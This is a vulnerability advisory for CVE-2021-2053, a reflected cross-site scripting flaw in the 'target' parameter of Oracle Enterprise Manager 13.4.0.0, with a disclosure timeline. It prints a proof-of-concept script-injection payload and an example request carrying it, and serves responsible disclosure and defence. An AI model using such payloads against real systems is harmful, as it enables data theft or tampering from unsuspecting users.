CVE-2021-2053
Reflected Cross-Site Scripting in "target" query parameter
6.1 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Oracle Enterprise Manager
13.4.0.0
Jakub Sajniak and Artur Obuchowski
Reflected Cross-Site Scripting vulnerability exists in target
GET parameter of the OEM 13.4.0.0 version. A specially crafted URL can trigger XSS attack. Successful attack requires victim interaction (clicking on the malicious link) and can result in modifying or exfiltrating data from the affected application.
In order to exploit the vulnerability you have to append target
parameter to URL with the following payload:
</script><script>alert(document.domain)</script>
Conducted tests showed that multiple endpoints process
parameter.target
Example request:
GET /em/faces/as-wsm-mgmt-asyncresponse?type=weblogic_domain&target=%2FEMGC_GCDomain%2FGCDomain%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&[...REDACTED...] HTTP/1.1
- 24-09-2020 - Vulnerability reported to vendor
- 25-09-2020 - Vendor response
- 25-10-2020 - Vendor update
- 24-02-2021 - Issue addressed
- 24-04-2021 - Vendor disclosure
- 26-04-2021 - Public disclosure